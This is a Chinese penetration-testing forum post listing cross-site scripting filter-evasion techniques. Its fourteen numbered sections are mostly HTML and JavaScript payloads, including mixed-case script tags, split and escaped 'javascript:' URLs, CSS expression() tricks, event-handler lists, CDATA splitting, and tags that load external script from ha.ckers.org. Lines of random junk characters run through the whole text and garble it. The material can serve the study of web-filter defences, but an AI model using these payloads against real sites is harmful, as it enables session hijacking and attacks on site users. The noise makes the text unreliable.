中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
5 [8 b0 `7 @  N  M! e# A$ a# R
% l& O2 |* N& x4 s' ~. l7 [% n, A 0 ~, O  K9 _5 S) ^
3 `: ~$ L" [$ j- I" z
    <sCript>alert(‘d’)</scRipT>
5 G: R5 N! X% N% A6 ~" W9 `; N
% V4 Y. @" W) G4 l9 X2. 利用多加一些其它字符来规避Regular Expression的检查
- w3 ^: {) r7 x  `) |  o( z
3 D) ?* h  p1 w  b    <<script>alert(‘c’)//<</script>
# ~2 c; i$ Z* q; n8 a6 ?( Y  E
    <SCRIPT a=">" SRC="t.js"></SCRIPT>
5 C# ~3 b7 E5 e( j' a4 S. r- e4 e  \
    <SCRIPT =">" SRC="t.js"></SCRIPT>7 U0 h# W1 U; v( X( S# D

# I: R2 F( x& N) `    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>7 o) b8 @2 J+ O* d, F/ h8 a  m! h- g) p

: b, \, S; c6 b5 D$ q: K  u  U    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
& ?$ ^# s7 J) O  I7 f8 k/ Z( G) P0 a# A7 d! P
    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
- L3 g0 d9 b- Y/ u* H' P
( {: x; H' |+ {. Z( x    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>* _' |- W; Z' m# E3 M- g$ o2 B

! F( z: y+ q! K% ?" q! w, J3. 以其它扩展名取代.js4 U1 t2 E: v& s& v$ c. [
9 x2 n/ I6 x1 {- j! U( |
    <script src="bad.jpg"></script>
8 `9 F0 e4 c$ q3 J! g- A
) t8 O! Y+ ^  F2 [# W" k1 e4. 将Javascript写在CSS档里4 n/ l  B) H5 R

7 O. B- L  A/ V% F1 i    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">& }3 x7 o; ^, [+ w- N* F8 N5 t2 I

" x' U( P. T& i; r$ y, t" c       example:+ t4 u" C' `% Z  {( ~

. u$ @* C# {, A0 _          body {
  Q9 A- h0 F# Q! b# A% v4 O% `
5 r7 L% j- {* N) ~               background-image: url(‘javascript:alert("XSS");’)3 e! C3 U: n: ^6 f0 @; v% x6 F; H
! m9 w0 v/ E, l3 V3 V8 G
          }& P5 e6 Z3 c  p: p  O
- w6 |2 H( K  L4 o
5. 在script的tag里加入一些其它字符
" p9 B* s5 s  u% @  f: W6 l
) W0 B" j/ X7 d0 _" U; h5 r" z    <SCRIPT/SRC="t.js"></SCRIPT>6 {9 w& \) \0 E1 S! \6 b5 X# ~( u' [* l

4 R; n+ ]- ~) @; {, j    <SCRIPT/anyword SRC="t.js"></SCRIPT>
. q/ @: X5 L6 O; s! u4 H9 j- o
, K2 A6 s; H# s2 @. z) w6. 使用tab或是new line来规避
$ T' a" J  S6 e5 A$ }, v1 r1 m* E8 J" h3 X$ M# b  L. X6 V
    <img src="jav ascr ipt:alert(‘XSS3′)">
% r$ w4 Y) S* R& n+ w- u" Q+ d; V! ~  f7 X$ f3 J
    <img src="jav ascr ipt:alert(‘XSS3′)">9 h& |" E* @$ m* l: g: r

( `5 b0 L) M7 P3 `    <IMG SRC="jav ascript:alert(‘XSS’);">
) ^9 [/ L8 U! A* H# i5 I; e; v5 S$ m: g2 D! P9 Z& w
         -> tag
7 I' i4 q1 A1 r* D4 u; _, }- e: z. x5 J% [
         -> new line
- v3 W  r0 v/ a- S* D
7 s+ k8 e. h4 e1 D7 b$ E( f/ Z5 ]7. 使用"\"来规避9 U$ u) D, w8 d5 K0 ^* Y6 R
9 K6 s- d/ w# s% J# \; k" O3 Y
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>  Z; x0 @* F! m; p& ?4 R
6 f& x* _& c( `2 r. ]& w3 Q
    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>6 A! O, c3 E" D+ t/ o1 g: {

7 g1 T* }6 D, j6 x4 {- d9 {    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">& }( [) v, M" n

0 x, |: V; w: a1 f    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 G8 x" d) s6 ?6 S

% _. s* w1 e8 @+ f    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>! I& E* [. q+ a
* I  @& l9 r" L6 Y
8. 使用Hex encode来规避(也可能会把";"拿掉)+ s: r' J- R, M

* s! M6 A; i# S% C    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
. c7 B% v) M* \, i0 }# H0 k2 ~4 |: e# j2 _# t. n' [
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">2 D7 o' b& X& X7 v5 J: m/ K- t

& s* Z* U9 A# m5 i    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
4 G/ I4 o; N8 l; {9 c! N7 [0 _4 l2 }2 ~/ B' a2 z: N
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">( |' r' V+ V* L! @, \2 c  Y
4 K! e/ T( i$ ^8 v  M. V# \
9. script in HTML tag* V  l5 ?$ _$ ~, F( f5 E  M

, O) f# C- d7 q  V/ W8 j    <body onload=」alert(‘onload’)」>( s' F% q, n" Q8 `2 X
0 _* f( @% o% n( ]2 s
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload9 {, t0 u9 Q- x6 w( M

- o) a% T+ n- K. K! a5 E1 i10. 在swf里含有xss的code
6 n% T# c: g: ]7 E& `! G
3 c  e3 ?7 s# u2 F) _+ q    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>' t9 l! `( I* R

, ?& _/ q9 j# s2 H. _+ {$ J11. 利用CDATA将xss的code拆开,再组合起来。: _' X- e6 |7 ]1 H/ a# J; D; V

( ^& w  \* l5 Z! o* g    <XML ID=I><X><C>% \; `" z- A% f7 q7 q, b' _

, ?  @1 H' d" j- _    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
/ c& }: I+ e4 m: T% t% k
* x; n& R0 w7 g2 [& w    </C></X>; m+ F4 x0 K  P
8 B. w5 `$ D( u; C; D! X
    </xml>' R9 ]/ f) I/ q, d
" \+ Z, J/ {7 r! L) ~. ?
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
; o! B' K  N. \% t
, g* S8 q% R0 O    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>- b. O  t* U9 Z" k4 k
* |3 A0 u. E; U( o* l
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>4 }0 W. j8 O. a2 }

* T! Q8 N2 R$ C8 k12. 利用HTML+TIME。
/ h7 C! N2 @5 A0 t3 J: g' K
" N  h$ i1 Z( g. Y2 Q) W% z; h    <HTML><BODY>( F$ B3 ^4 P! M; a5 M. D
* z$ |7 x8 a9 P1 X2 r6 ~" b, z- d
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">8 e3 m0 S9 }- t  N
8 l6 P& \' I* j, T1 n  Q3 r0 }
    <?import namespace="t" implementation="#default#time2">
- k1 E! z1 a7 p
5 F" l) x7 z  z* a' i4 E) y    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">- X; W+ i+ d/ ]/ {1 r5 m6 Z- @4 J. o3 u

8 E9 J* B" o+ t3 t6 t; c7 l    </BODY></HTML>
0 A& t# D; t/ g1 y9 _
0 w  K; Q4 Y9 v/ l0 p13. 透过META写入Cookie。$ p5 M: ?1 h8 s+ Q4 w- A
) {# S" E8 t7 }; o* V% q
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">, ?6 j3 u! p( Q; v% L( t  L0 u
2 C/ C$ X/ K' T4 s" \' Z
14. javascript in src , href , url
$ f# y, P6 a6 g% l- c, {- M* _! Y: e, Q7 h/ n' z
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
# \/ r& I; e0 [  B# [( J* Y5 @- y6 L, Z! g! Y
    <img src="javascript:alert(‘XSS3′)">
# J+ L" M) I2 P: l$ {" b
1 s2 V/ g& A" J# U5 y, P6 W) M<IMG DYNSRC="javascript:alert(‘XSS20′)">
8 p) O4 ], K* Y2 X0 z" X8 I1 f$ F& _
* r7 c, {5 l! b9 L  k2 w+ Z    <IMG LOWSRC="javascript:alert(‘XSS21′)">
  l$ U( ?5 K4 Q
7 U0 r8 p5 N, J& J1 b$ s    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">1 {: @0 x2 t. ?/ }
9 v6 }2 S- J# R+ x
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>" @+ k. j( b/ y, [

* ]) U+ K) [+ K, ~- U    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">+ [! Y6 `) Z# m/ r# `0 w

5 m5 z: v. \9 V4 O    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
' }% U* ?, ^& D9 v* h/ ^
' w- S+ h8 `$ n! Y  A    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
9 w$ R( J" t' X
7 I* j, _/ k4 N! Y  c/ y    </STYLE><A CLASS=XSS></A>
( T8 f( k: ]+ S+ G. J* i: \9 A* b" u- T
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
, q  c+ B( A$ C8 n6 n0 O" ~. v* t& T$ \# T& Z! z. H




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2